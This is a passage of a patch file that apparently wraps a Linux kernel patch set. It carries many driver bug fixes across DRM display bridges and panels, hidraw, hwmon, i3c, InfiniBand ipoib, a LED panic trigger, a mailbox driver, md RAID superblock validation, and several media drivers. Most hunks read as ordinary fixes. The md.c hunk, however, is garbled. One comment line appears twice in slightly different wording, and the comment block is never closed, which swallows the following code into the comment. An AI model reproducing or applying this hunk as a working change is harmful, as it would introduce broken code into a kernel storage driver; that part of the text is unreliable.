+-	ret |= anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
+-				 HPD_DET_TIMER_BIT8_15,
+-				 (HPD_TIME >> 8) & 0xFF);
+-	ret |= anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
+-				 HPD_DET_TIMER_BIT16_23,
+-				 (HPD_TIME >> 16) & 0xFF);
+-	if (ret < 0)
+-		return ret;
+-
+ 	return anx7625_reg_read(ctx, ctx->i2c.rx_p0_client, SYSTEM_STSTUS);
+ }
+ 
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.h b/drivers/gpu/drm/bridge/analogix/anx7625.h
+index 239956199e1b9..164250c8c8b63 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.h
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.h
+@@ -259,6 +259,10 @@
+ #define AP_MIPI_RX_EN BIT(5) /* 1: MIPI RX input in  0: no RX in */
+ #define AP_DISABLE_PD BIT(6)
+ #define AP_DISABLE_DISPLAY BIT(7)
++
++#define GPIO_CTRL_2   0x49
++#define HPD_SOURCE    BIT(6)
++
+ /***************************************************************/
+ /* Register definition of device address 0x84 */
+ #define  MIPI_PHY_CONTROL_3            0x03
+diff --git a/drivers/gpu/drm/drm_file.c b/drivers/gpu/drm/drm_file.c
+index a8b4d918e9a3f..d6a0572984b54 100644
+--- a/drivers/gpu/drm/drm_file.c
++++ b/drivers/gpu/drm/drm_file.c
+@@ -406,7 +406,7 @@ int drm_open(struct inode *inode, struct file *filp)
+ {
+ 	struct drm_device *dev;
+ 	struct drm_minor *minor;
+-	int retcode;
++	int retcode = 0;
+ 	int need_setup = 0;
+ 
+ 	minor = drm_minor_acquire(iminor(inode));
+diff --git a/drivers/gpu/drm/drm_framebuffer.c b/drivers/gpu/drm/drm_framebuffer.c
+index 2dd97473ca105..72ad1715f8e75 100644
+--- a/drivers/gpu/drm/drm_framebuffer.c
++++ b/drivers/gpu/drm/drm_framebuffer.c
+@@ -570,7 +570,7 @@ int drm_mode_getfb2_ioctl(struct drm_device *dev,
+ 	struct drm_mode_fb_cmd2 *r = data;
+ 	struct drm_framebuffer *fb;
+ 	unsigned int i;
+-	int ret;
++	int ret = 0;
+ 
+ 	if (!drm_core_check_feature(dev, DRIVER_MODESET))
+ 		return -EINVAL;
+diff --git a/drivers/gpu/drm/drm_mipi_dsi.c b/drivers/gpu/drm/drm_mipi_dsi.c
+index 853208e8dd736..ef7ec68867df0 100644
+--- a/drivers/gpu/drm/drm_mipi_dsi.c
++++ b/drivers/gpu/drm/drm_mipi_dsi.c
+@@ -346,7 +346,8 @@ static int mipi_dsi_remove_device_fn(struct device *dev, void *priv)
+ {
+ 	struct mipi_dsi_device *dsi = to_mipi_dsi_device(dev);
+ 
+-	mipi_dsi_detach(dsi);
++	if (dsi->attached)
++		mipi_dsi_detach(dsi);
+ 	mipi_dsi_device_unregister(dsi);
+ 
+ 	return 0;
+@@ -369,11 +370,18 @@ EXPORT_SYMBOL(mipi_dsi_host_unregister);
+ int mipi_dsi_attach(struct mipi_dsi_device *dsi)
+ {
+ 	const struct mipi_dsi_host_ops *ops = dsi->host->ops;
++	int ret;
+ 
+ 	if (!ops || !ops->attach)
+ 		return -ENOSYS;
+ 
+-	return ops->attach(dsi->host, dsi);
++	ret = ops->attach(dsi->host, dsi);
++	if (ret)
++		return ret;
++
++	dsi->attached = true;
++
++	return 0;
+ }
+ EXPORT_SYMBOL(mipi_dsi_attach);
+ 
+@@ -385,9 +393,14 @@ int mipi_dsi_detach(struct mipi_dsi_device *dsi)
+ {
+ 	const struct mipi_dsi_host_ops *ops = dsi->host->ops;
+ 
++	if (WARN_ON(!dsi->attached))
++		return -EINVAL;
++
+ 	if (!ops || !ops->detach)
+ 		return -ENOSYS;
+ 
++	dsi->attached = false;
++
+ 	return ops->detach(dsi->host, dsi);
+ }
+ EXPORT_SYMBOL(mipi_dsi_detach);
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_drv.c b/drivers/gpu/drm/exynos/exynos_drm_drv.c
+index 16c539657f730..4095b0d3ac2e3 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_drv.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_drv.c
+@@ -309,6 +309,7 @@ err_mode_config_cleanup:
+ 	drm_mode_config_cleanup(drm);
+ 	exynos_drm_cleanup_dma(drm);
+ 	kfree(private);
++	dev_set_drvdata(dev, NULL);
+ err_free_drm:
+ 	drm_dev_put(drm);
+ 
+@@ -323,6 +324,7 @@ static void exynos_drm_unbind(struct device *dev)
+ 
+ 	exynos_drm_fbdev_fini(drm);
+ 	drm_kms_helper_poll_fini(drm);
++	drm_atomic_helper_shutdown(drm);
+ 
+ 	component_unbind_all(drm->dev, drm);
+ 	drm_mode_config_cleanup(drm);
+@@ -360,9 +362,18 @@ static int exynos_drm_platform_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
++static void exynos_drm_platform_shutdown(struct platform_device *pdev)
++{
++	struct drm_device *drm = platform_get_drvdata(pdev);
++
++	if (drm)
++		drm_atomic_helper_shutdown(drm);
++}
++
+ static struct platform_driver exynos_drm_platform_driver = {
+ 	.probe	= exynos_drm_platform_probe,
+ 	.remove	= exynos_drm_platform_remove,
++	.shutdown = exynos_drm_platform_shutdown,
+ 	.driver	= {
+ 		.name	= "exynos-drm",
+ 		.pm	= &exynos_drm_pm_ops,
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index b0eb881f8af13..38d38f923df64 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -38,6 +38,9 @@
+ #define DPU_ERROR_ENC(e, fmt, ...) DPU_ERROR("enc%d " fmt,\
+ 		(e) ? (e)->base.base.id : -1, ##__VA_ARGS__)
+ 
++#define DPU_ERROR_ENC_RATELIMITED(e, fmt, ...) DPU_ERROR_RATELIMITED("enc%d " fmt,\
++		(e) ? (e)->base.base.id : -1, ##__VA_ARGS__)
++
+ /*
+  * Two to anticipate panels that can do cmd/vid dynamic switching
+  * plan is to create all possible physical encoder types, and switch between
+@@ -2385,7 +2388,7 @@ static void dpu_encoder_frame_done_timeout(struct timer_list *t)
+ 		return;
+ 	}
+ 
+-	DPU_ERROR_ENC(dpu_enc, "frame done timeout\n");
++	DPU_ERROR_ENC_RATELIMITED(dpu_enc, "frame done timeout\n");
+ 
+ 	event = DPU_ENCODER_FRAME_EVENT_ERROR;
+ 	trace_dpu_enc_frame_done_timeout(DRMID(drm_enc), event);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
+index a3e413d277175..63dc2ee446d47 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_wb.c
+@@ -105,6 +105,9 @@ static void dpu_hw_wb_setup_format(struct dpu_hw_wb *ctx,
+ 			dst_format |= BIT(14); /* DST_ALPHA_X */
+ 	}
+ 
++	if (DPU_FORMAT_IS_YUV(fmt))
++		dst_format |= BIT(15);
++
+ 	pattern = (fmt->element[3] << 24) |
+ 		(fmt->element[2] << 16) |
+ 		(fmt->element[1] << 8)  |
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
+index ed80ed6784eee..bb35aa5f5709f 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.h
+@@ -51,6 +51,7 @@
+ 	} while (0)
+ 
+ #define DPU_ERROR(fmt, ...) pr_err("[dpu error]" fmt, ##__VA_ARGS__)
++#define DPU_ERROR_RATELIMITED(fmt, ...) pr_err_ratelimited("[dpu error]" fmt, ##__VA_ARGS__)
+ 
+ /**
+  * ktime_compare_safe - compare two ktime structures
+diff --git a/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c b/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
+index 62bc3756f2e2b..c0bcf020ef662 100644
+--- a/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
++++ b/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
+@@ -673,6 +673,10 @@ static int dsi_phy_driver_probe(struct platform_device *pdev)
+ 		return dev_err_probe(dev, PTR_ERR(phy->ahb_clk),
+ 				     "Unable to get ahb clk\n");
+ 
++	ret = devm_pm_runtime_enable(&pdev->dev);
++	if (ret)
++		return ret;
++
+ 	/* PLL init will call into clk_register which requires
+ 	 * register access, so we need to enable power and ahb clock.
+ 	 */
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index ecd6238749f7a..42584d8a9aeb6 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -203,6 +203,9 @@ struct edp_panel_entry {
+ 
+ 	/** @name: Name of this panel (for printing to logs). */
+ 	const char *name;
++
++	/** @override_edid_mode: Override the mode obtained by edid. */
++	const struct drm_display_mode *override_edid_mode;
+ };
+ 
+ struct panel_edp {
+@@ -301,6 +304,24 @@ static unsigned int panel_edp_get_display_modes(struct panel_edp *panel,
+ 	return num;
+ }
+ 
++static int panel_edp_override_edid_mode(struct panel_edp *panel,
++					struct drm_connector *connector,
++					const struct drm_display_mode *override_mode)
++{
++	struct drm_display_mode *mode;
++
++	mode = drm_mode_duplicate(connector->dev, override_mode);
++	if (!mode) {
++		dev_err(panel->base.dev, "failed to add additional mode\n");
++		return 0;
++	}
++
++	mode->type |= DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED;
++	drm_mode_set_name(mode);
++	drm_mode_probed_add(connector, mode);
++	return 1;
++}
++
+ static int panel_edp_get_non_edid_modes(struct panel_edp *panel,
+ 					struct drm_connector *connector)
+ {
+@@ -568,6 +589,9 @@ static int panel_edp_get_modes(struct drm_panel *panel,
+ {
+ 	struct panel_edp *p = to_panel_edp(panel);
+ 	int num = 0;
++	bool has_override_edid_mode = p->detected_panel &&
++				      p->detected_panel != ERR_PTR(-EINVAL) &&
++				      p->detected_panel->override_edid_mode;
+ 
+ 	/* probe EDID if a DDC bus is available */
+ 	if (p->ddc) {
+@@ -575,9 +599,18 @@ static int panel_edp_get_modes(struct drm_panel *panel,
+ 
+ 		if (!p->edid)
+ 			p->edid = drm_get_edid(connector, p->ddc);
+-
+-		if (p->edid)
+-			num += drm_add_edid_modes(connector, p->edid);
++		if (p->edid) {
++			if (has_override_edid_mode) {
++				/*
++				 * override_edid_mode is specified. Use
++				 * it instead of the modes from the EDID.
++				 */
++				num += panel_edp_override_edid_mode(p, connector,
++						p->detected_panel->override_edid_mode);
++			} else {
++				num += drm_add_edid_modes(connector, p->edid);
++			}
++		}
+ 
+ 		pm_runtime_mark_last_busy(panel->dev);
+ 		pm_runtime_put_autosuspend(panel->dev);
+@@ -1861,6 +1894,15 @@ static const struct panel_delay delay_200_500_e200 = {
+ 	.delay = _delay \
+ }
+ 
++#define EDP_PANEL_ENTRY2(vend_chr_0, vend_chr_1, vend_chr_2, product_id, _delay, _name, _mode) \
++{ \
++	.name = _name, \
++	.panel_id = drm_edid_encode_panel_id(vend_chr_0, vend_chr_1, vend_chr_2, \
++					     product_id), \
++	.delay = _delay, \
++	.override_edid_mode = _mode \
++}
++
+ /*
+  * This table is used to figure out power sequencing delays for panels that
+  * are detected by EDID. Entries here may point to entries in the
+diff --git a/drivers/hid/hidraw.c b/drivers/hid/hidraw.c
+index b617aada50b06..7b097ab2170c3 100644
+--- a/drivers/hid/hidraw.c
++++ b/drivers/hid/hidraw.c
+@@ -355,8 +355,11 @@ static int hidraw_release(struct inode * inode, struct file * file)
+ 	down_write(&minors_rwsem);
+ 
+ 	spin_lock_irqsave(&hidraw_table[minor]->list_lock, flags);
+-	for (int i = list->tail; i < list->head; i++)
+-		kfree(list->buffer[i].value);
++	while (list->tail != list->head) {
++		kfree(list->buffer[list->tail].value);
++		list->buffer[list->tail].value = NULL;
++		list->tail = (list->tail + 1) & (HIDRAW_BUFFER_SIZE - 1);
++	}
+ 	list_del(&list->node);
+ 	spin_unlock_irqrestore(&hidraw_table[minor]->list_lock, flags);
+ 	kfree(list);
+diff --git a/drivers/hwmon/nct6775-core.c b/drivers/hwmon/nct6775-core.c
+index 80310845fb993..9720ad214c20b 100644
+--- a/drivers/hwmon/nct6775-core.c
++++ b/drivers/hwmon/nct6775-core.c
+@@ -2462,6 +2462,13 @@ store_pwm(struct device *dev, struct device_attribute *attr, const char *buf,
+ 	int err;
+ 	u16 reg;
+ 
++	/*
++	 * The fan control mode must be set to manual before the user can adjust
++	 * the fan speed. Otherwise, the write fails with -EBUSY.
++	 */
++	if (index == 0 && data->pwm_enable[nr] > manual)
++		return -EBUSY;
++
+ 	err = kstrtoul(buf, 10, &val);
+ 	if (err < 0)
+ 		return err;
+diff --git a/drivers/i3c/master/i3c-master-cdns.c b/drivers/i3c/master/i3c-master-cdns.c
+index 4a49c75a9408c..b9cfda6ae9ae5 100644
+--- a/drivers/i3c/master/i3c-master-cdns.c
++++ b/drivers/i3c/master/i3c-master-cdns.c
+@@ -77,7 +77,8 @@
+ #define PRESCL_CTRL0			0x14
+ #define PRESCL_CTRL0_I2C(x)		((x) << 16)
+ #define PRESCL_CTRL0_I3C(x)		(x)
+-#define PRESCL_CTRL0_MAX		GENMASK(9, 0)
++#define PRESCL_CTRL0_I3C_MAX		GENMASK(9, 0)
++#define PRESCL_CTRL0_I2C_MAX		GENMASK(15, 0)
+ 
+ #define PRESCL_CTRL1			0x18
+ #define PRESCL_CTRL1_PP_LOW_MASK	GENMASK(15, 8)
+@@ -1234,7 +1235,7 @@ static int cdns_i3c_master_bus_init(struct i3c_master_controller *m)
+ 		return -EINVAL;
+ 
+ 	pres = DIV_ROUND_UP(sysclk_rate, (bus->scl_rate.i3c * 4)) - 1;
+-	if (pres > PRESCL_CTRL0_MAX)
++	if (pres > PRESCL_CTRL0_I3C_MAX)
+ 		return -ERANGE;
+ 
+ 	bus->scl_rate.i3c = sysclk_rate / ((pres + 1) * 4);
+@@ -1247,7 +1248,7 @@ static int cdns_i3c_master_bus_init(struct i3c_master_controller *m)
+ 	max_i2cfreq = bus->scl_rate.i2c;
+ 
+ 	pres = (sysclk_rate / (max_i2cfreq * 5)) - 1;
+-	if (pres > PRESCL_CTRL0_MAX)
++	if (pres > PRESCL_CTRL0_I2C_MAX)
+ 		return -ERANGE;
+ 
+ 	bus->scl_rate.i2c = sysclk_rate / ((pres + 1) * 5);
+diff --git a/drivers/infiniband/ulp/ipoib/ipoib_multicast.c b/drivers/infiniband/ulp/ipoib/ipoib_multicast.c
+index 5b3154503bf49..319d4288eddde 100644
+--- a/drivers/infiniband/ulp/ipoib/ipoib_multicast.c
++++ b/drivers/infiniband/ulp/ipoib/ipoib_multicast.c
+@@ -531,21 +531,18 @@ static int ipoib_mcast_join(struct net_device *dev, struct ipoib_mcast *mcast)
+ 		if (test_bit(IPOIB_MCAST_FLAG_SENDONLY, &mcast->flags))
+ 			rec.join_state = SENDONLY_FULLMEMBER_JOIN;
+ 	}
+-	spin_unlock_irq(&priv->lock);
+ 
+ 	multicast = ib_sa_join_multicast(&ipoib_sa_client, priv->ca, priv->port,
+-					 &rec, comp_mask, GFP_KERNEL,
++					 &rec, comp_mask, GFP_ATOMIC,
+ 					 ipoib_mcast_join_complete, mcast);
+-	spin_lock_irq(&priv->lock);
+ 	if (IS_ERR(multicast)) {
+ 		ret = PTR_ERR(multicast);
+ 		ipoib_warn(priv, "ib_sa_join_multicast failed, status %d\n", ret);
+ 		/* Requeue this join task with a backoff delay */
+ 		__ipoib_mcast_schedule_join_thread(priv, mcast, 1);
+ 		clear_bit(IPOIB_MCAST_FLAG_BUSY, &mcast->flags);
+-		spin_unlock_irq(&priv->lock);
+ 		complete(&mcast->done);
+-		spin_lock_irq(&priv->lock);
++		return ret;
+ 	}
+ 	return 0;
+ }
+diff --git a/drivers/leds/trigger/ledtrig-panic.c b/drivers/leds/trigger/ledtrig-panic.c
+index 64abf2e91608a..5a6b21bfeb9af 100644
+--- a/drivers/leds/trigger/ledtrig-panic.c
++++ b/drivers/leds/trigger/ledtrig-panic.c
+@@ -64,10 +64,13 @@ static long led_panic_blink(int state)
+ 
+ static int __init ledtrig_panic_init(void)
+ {
++	led_trigger_register_simple("panic", &trigger);
++	if (!trigger)
++		return -ENOMEM;
++
+ 	atomic_notifier_chain_register(&panic_notifier_list,
+ 				       &led_trigger_panic_nb);
+ 
+-	led_trigger_register_simple("panic", &trigger);
+ 	panic_blink = led_panic_blink;
+ 	return 0;
+ }
+diff --git a/drivers/mailbox/arm_mhuv2.c b/drivers/mailbox/arm_mhuv2.c
+index c6d4957c4da83..0ec21dcdbde72 100644
+--- a/drivers/mailbox/arm_mhuv2.c
++++ b/drivers/mailbox/arm_mhuv2.c
+@@ -553,7 +553,8 @@ static irqreturn_t mhuv2_sender_interrupt(int irq, void *data)
+ 	priv = chan->con_priv;
+ 
+ 	if (!IS_PROTOCOL_DOORBELL(priv)) {
+-		writel_relaxed(1, &mhu->send->ch_wn[priv->ch_wn_idx + priv->windows - 1].int_clr);
++		for (i = 0; i < priv->windows; i++)
++			writel_relaxed(1, &mhu->send->ch_wn[priv->ch_wn_idx + i].int_clr);
+ 
+ 		if (chan->cl) {
+ 			mbox_chan_txdone(chan, 0);
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 6120f26a79696..3ccf1920682cb 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -1145,6 +1145,7 @@ struct super_type  {
+ 					  struct md_rdev *refdev,
+ 					  int minor_version);
+ 	int		    (*validate_super)(struct mddev *mddev,
++					      struct md_rdev *freshest,
+ 					      struct md_rdev *rdev);
+ 	void		    (*sync_super)(struct mddev *mddev,
+ 					  struct md_rdev *rdev);
+@@ -1282,8 +1283,9 @@ static int super_90_load(struct md_rdev *rdev, struct md_rdev *refdev, int minor
+ 
+ /*
+  * validate_super for 0.90.0
++ * note: we are not using "freshest" for 0.9 superblock
+  */
+-static int super_90_validate(struct mddev *mddev, struct md_rdev *rdev)
++static int super_90_validate(struct mddev *mddev, struct md_rdev *freshest, struct md_rdev *rdev)
+ {
+ 	mdp_disk_t *desc;
+ 	mdp_super_t *sb = page_address(rdev->sb_page);
+@@ -1795,7 +1797,7 @@ static int super_1_load(struct md_rdev *rdev, struct md_rdev *refdev, int minor_
+ 	return ret;
+ }
+ 
+-static int super_1_validate(struct mddev *mddev, struct md_rdev *rdev)
++static int super_1_validate(struct mddev *mddev, struct md_rdev *freshest, struct md_rdev *rdev)
+ {
+ 	struct mdp_superblock_1 *sb = page_address(rdev->sb_page);
+ 	__u64 ev1 = le64_to_cpu(sb->events);
+@@ -1891,13 +1893,15 @@ static int super_1_validate(struct mddev *mddev, struct md_rdev *rdev)
+ 		}
+ 	} else if (mddev->pers == NULL) {
+ 		/* Insist of good event counter while assembling, except for
+-		 * spares (which don't need an event count) */
+-		++ev1;
++		 * spares (which don't need an event count).
++		 * Similar to mdadm, we allow an event counter difference of 1
++		 * from the freshest device.
++		 */
+ 		if (rdev->desc_nr >= 0 &&
+ 		    rdev->desc_nr < le32_to_cpu(sb->max_dev) &&
+ 		    (le16_to_cpu(sb->dev_roles[rdev->desc_nr]) < MD_DISK_ROLE_MAX ||
+ 		     le16_to_cpu(sb->dev_roles[rdev->desc_nr]) == MD_DISK_ROLE_JOURNAL))
+-			if (ev1 < mddev->events)
++			if (ev1 + 1 < mddev->events)
+ 				return -EINVAL;
+ 	} else if (mddev->bitmap) {
+ 		/* If adding to array with a bitmap, then we can accept an
+@@ -1918,8 +1922,38 @@ static int super_1_validate(struct mddev *mddev, struct md_rdev *rdev)
+ 		    rdev->desc_nr >= le32_to_cpu(sb->max_dev)) {
+ 			role = MD_DISK_ROLE_SPARE;
+ 			rdev->desc_nr = -1;
+-		} else
++		} else if (mddev->pers == NULL && freshest && ev1 < mddev->events) {
++			/*
++			 * If we are assembling, and our event counter is smaller than the
++			 * highest event counter, we cannot trust our superblock about the role.
++			 * It could happen that our rdev was marked as Faulty, and all other
++			 * superblocks were updated with +1 event counter.
++			 * Then, before the next superblock update, which typically happens when
++			 * remove_and_add_spares() removes the device from the array, there was
++			 * a crash or reboot.
++			 * If we allow the current rdev without consulting the freshest superblock,
++			 * we could cause data corruption.
++			 * Note that in this case our event counter is smaller by 1 than the
++			 * highest, otherwise, this rdev would not be allowed into array;
++			 * highest; otherwise, this rdev would not be allowed into the array.
++			 * Both the kernel and mdadm allow an event counter difference of 1.
++			struct mdp_superblock_1 *freshest_sb = page_address(freshest->sb_page);
++			u32 freshest_max_dev = le32_to_cpu(freshest_sb->max_dev);
++
++			if (rdev->desc_nr >= freshest_max_dev) {
++				/* this is unexpected, better not proceed */
++				pr_warn("md: %s: rdev[%pg]: desc_nr(%d) >= freshest(%pg)->sb->max_dev(%u)\n",
++						mdname(mddev), rdev->bdev, rdev->desc_nr,
++						freshest->bdev, freshest_max_dev);
++				return -EUCLEAN;
++			}
++
++			role = le16_to_cpu(freshest_sb->dev_roles[rdev->desc_nr]);
++			pr_debug("md: %s: rdev[%pg]: role=%d(0x%x) according to freshest %pg\n",
++				     mdname(mddev), rdev->bdev, role, role, freshest->bdev);
++		} else {
+ 			role = le16_to_cpu(sb->dev_roles[rdev->desc_nr]);
++		}
+ 		switch(role) {
+ 		case MD_DISK_ROLE_SPARE: /* spare */
+ 			break;
+@@ -2861,7 +2895,7 @@ static int add_bound_rdev(struct md_rdev *rdev)
+ 		 * and should be added immediately.
+ 		 */
+ 		super_types[mddev->major_version].
+-			validate_super(mddev, rdev);
++			validate_super(mddev, NULL/*freshest*/, rdev);
+ 		if (add_journal)
+ 			mddev_suspend(mddev);
+ 		err = mddev->pers->hot_add_disk(mddev, rdev);
+@@ -3775,7 +3809,7 @@ static int analyze_sbs(struct mddev *mddev)
+ 	}
+ 
+ 	super_types[mddev->major_version].
+-		validate_super(mddev, freshest);
++		validate_super(mddev, NULL/*freshest*/, freshest);
+ 
+ 	i = 0;
+ 	rdev_for_each_safe(rdev, tmp, mddev) {
+@@ -3790,7 +3824,7 @@ static int analyze_sbs(struct mddev *mddev)
+ 		}
+ 		if (rdev != freshest) {
+ 			if (super_types[mddev->major_version].
+-			    validate_super(mddev, rdev)) {
++			    validate_super(mddev, freshest, rdev)) {
+ 				pr_warn("md: kicking non-fresh %pg from array!\n",
+ 					rdev->bdev);
+ 				md_kick_rdev_from_array(rdev);
+@@ -6804,7 +6838,7 @@ int md_add_new_disk(struct mddev *mddev, struct mdu_disk_info_s *info)
+ 			rdev->saved_raid_disk = rdev->raid_disk;
+ 		} else
+ 			super_types[mddev->major_version].
+-				validate_super(mddev, rdev);
++				validate_super(mddev, NULL/*freshest*/, rdev);
+ 		if ((info->state & (1<<MD_DISK_SYNC)) &&
+ 		     rdev->raid_disk != info->raid_disk) {
+ 			/* This was a hot-add request, but events doesn't
+diff --git a/drivers/media/i2c/imx335.c b/drivers/media/i2c/imx335.c
+index 078ede2b7a00f..8e91767d61300 100644
+--- a/drivers/media/i2c/imx335.c
++++ b/drivers/media/i2c/imx335.c
+@@ -971,8 +971,8 @@ static int imx335_init_controls(struct imx335 *imx335)
+ 	imx335->hblank_ctrl = v4l2_ctrl_new_std(ctrl_hdlr,
+ 						&imx335_ctrl_ops,
+ 						V4L2_CID_HBLANK,
+-						IMX335_REG_MIN,
+-						IMX335_REG_MAX,
++						mode->hblank,
++						mode->hblank,
+ 						1, mode->hblank);
+ 	if (imx335->hblank_ctrl)
+ 		imx335->hblank_ctrl->flags |= V4L2_CTRL_FLAG_READ_ONLY;
+diff --git a/drivers/media/pci/ddbridge/ddbridge-main.c b/drivers/media/pci/ddbridge/ddbridge-main.c
+index 91733ab9f58c3..363badab7cf07 100644
+--- a/drivers/media/pci/ddbridge/ddbridge-main.c
++++ b/drivers/media/pci/ddbridge/ddbridge-main.c
+@@ -238,7 +238,7 @@ fail:
+ 	ddb_unmap(dev);
+ 	pci_set_drvdata(pdev, NULL);
+ 	pci_disable_device(pdev);
+-	return -1;
++	return stat;
+ }
+ 
+ /****************************************************************************/
+diff --git a/drivers/media/platform/amphion/vpu.h b/drivers/media/platform/amphion/vpu.h
+index deb2288d42904..4f3d23b55b6da 100644
+--- a/drivers/media/platform/amphion/vpu.h
++++ b/drivers/media/platform/amphion/vpu.h
+@@ -152,7 +152,6 @@ struct vpu_core {
+ 	struct vpu_mbox tx_type;
+ 	struct vpu_mbox tx_data;
+ 	struct vpu_mbox rx;
+-	unsigned long cmd_seq;
+ 
+ 	wait_queue_head_t ack_wq;
+ 	struct completion cmp;
+@@ -251,6 +250,8 @@ struct vpu_inst {
+ 
+ 	struct list_head cmd_q;
+ 	void *pending;
++	unsigned long cmd_seq;
++	atomic_long_t last_response_cmd;
+ 
+ 	struct vpu_inst_ops *ops;
+ 	const struct vpu_format *formats;
+diff --git a/drivers/media/platform/amphion/vpu_cmds.c b/drivers/media/platform/amphion/vpu_cmds.c
+index 235b71398d403..c68163af29dc6 100644
+--- a/drivers/media/platform/amphion/vpu_cmds.c
++++ b/drivers/media/platform/amphion/vpu_cmds.c
+@@ -34,6 +34,7 @@ struct vpu_cmd_t {
+ 	struct vpu_cmd_request *request;
+ 	struct vpu_rpc_event *pkt;
+ 	unsigned long key;
++	atomic_long_t *last_response_cmd;
+ };
+ 
+ static struct vpu_cmd_request vpu_cmd_requests[] = {
+@@ -117,6 +118,8 @@ static void vpu_free_cmd(struct vpu_cmd_t *cmd)
+ {
+ 	if (!cmd)
+ 		return;
++	if (cmd->last_response_cmd)
++		atomic_long_set(cmd->last_response_cmd, cmd->key);
+ 	vfree(cmd->pkt);
+ 	vfree(cmd);
+ }
+@@ -174,7 +177,8 @@ static int vpu_request_cmd(struct vpu_inst *inst, u32 id, void *data,
+ 		return -ENOMEM;
+ 
+ 	mutex_lock(&core->cmd_lock);
+-	cmd->key = core->cmd_seq++;
++	cmd->key = ++inst->cmd_seq;
++	cmd->last_response_cmd = &inst->last_response_cmd;
+ 	if (key)
+ 		*key = cmd->key;
+ 	if (sync)
+@@ -248,26 +252,12 @@ void vpu_clear_request(struct vpu_inst *inst)
+ 
+ static bool check_is_responsed(struct vpu_inst *inst, unsigned long key)
+ {
+-	struct vpu_core *core = inst->core;
+-	struct vpu_cmd_t *cmd;
+-	bool flag = true;
++	unsigned long last_response = atomic_long_read(&inst->last_response_cmd);
+ 
+-	mutex_lock(&core->cmd_lock);
+-	cmd = inst->pending;
+-	if (cmd && key == cmd->key) {
+-		flag = false;
+-		goto exit;
+-	}
+-	list_for_each_entry(cmd, &inst->cmd_q, list) {
+-		if (key == cmd->key) {
+-			flag = false;
+-			break;
+-		}
+-	}
+-exit:
+-	mutex_unlock(&core->cmd_lock);
++	if (key <= last_response && (last_response - key) < (ULONG_MAX >> 1))
++		return true;
+ 
+-	return flag;
++	return false;
+ }
+ 
+ static int sync_session_response(struct vpu_inst *inst, unsigned long key, long timeout, int try)
+diff --git a/drivers/media/platform/amphion/vpu_v4l2.c b/drivers/media/platform/amphion/vpu_v4l2.c
+index e5c8e1a753ccd..e7a18948c4ab0 100644
+--- a/drivers/media/platform/amphion/vpu_v4l2.c
++++ b/drivers/media/platform/amphion/vpu_v4l2.c
+@@ -631,6 +631,7 @@ int vpu_v4l2_open(struct file *file, struct vpu_inst *inst)
+ 		func = &vpu->decoder;
+ 
+ 	atomic_set(&inst->ref_count, 0);
++	atomic_long_set(&inst->last_response_cmd, 0);
+ 	vpu_inst_get(inst);
+ 	inst->vpu = vpu;
+ 	inst->core = vpu_request_core(vpu, inst->type);
+diff --git a/drivers/media/platform/rockchip/rga/rga.c b/drivers/media/platform/rockchip/rga/rga.c
+index 61b25fcf826e9..9b20cef5afc61 100644
+--- a/drivers/media/platform/rockchip/rga/rga.c
++++ b/drivers/media/platform/rockchip/rga/rga.c
+@@ -187,25 +187,16 @@ static int rga_setup_ctrls(struct rga_ctx *ctx)
+ static struct rga_fmt formats[] = {
+ 	{
+ 		.fourcc = V4L2_PIX_FMT_ARGB32,
+-		.color_swap = RGA_COLOR_RB_SWAP,
++		.color_swap = RGA_COLOR_ALPHA_SWAP,
+ 		.hw_format = RGA_COLOR_FMT_ABGR8888,
+ 		.depth = 32,
+ 		.uv_factor = 1,
+ 		.y_div = 1,
+ 		.x_div = 1,
+ 	},
+-	{
+-		.fourcc = V4L2_PIX_FMT_XRGB32,
+-		.color_swap = RGA_COLOR_RB_SWAP,
+-		.hw_format = RGA_COLOR_FMT_XBGR8888,
+-		.depth = 32,
+-		.uv_factor = 1,
+-		.y_div = 1,
+-		.x_div = 1,
+-	},
+ 	{
+ 		.fourcc = V4L2_PIX_FMT_ABGR32,
+-		.color_swap = RGA_COLOR_ALPHA_SWAP,
++		.color_swap = RGA_COLOR_RB_SWAP,
+ 		.hw_format = RGA_COLOR_FMT_ABGR8888,
+ 		.depth = 32,
+ 		.uv_factor = 1,
+@@ -214,7 +205,7 @@ static struct rga_fmt formats[] = {
+ 	},
+ 	{
+ 		.fourcc = V4L2_PIX_FMT_XBGR32,
+-		.color_swap = RGA_COLOR_ALPHA_SWAP,
++		.color_swap = RGA_COLOR_RB_SWAP,
+ 		.hw_format = RGA_COLOR_FMT_XBGR8888,
+ 		.depth = 32,
+ 		.uv_factor = 1,
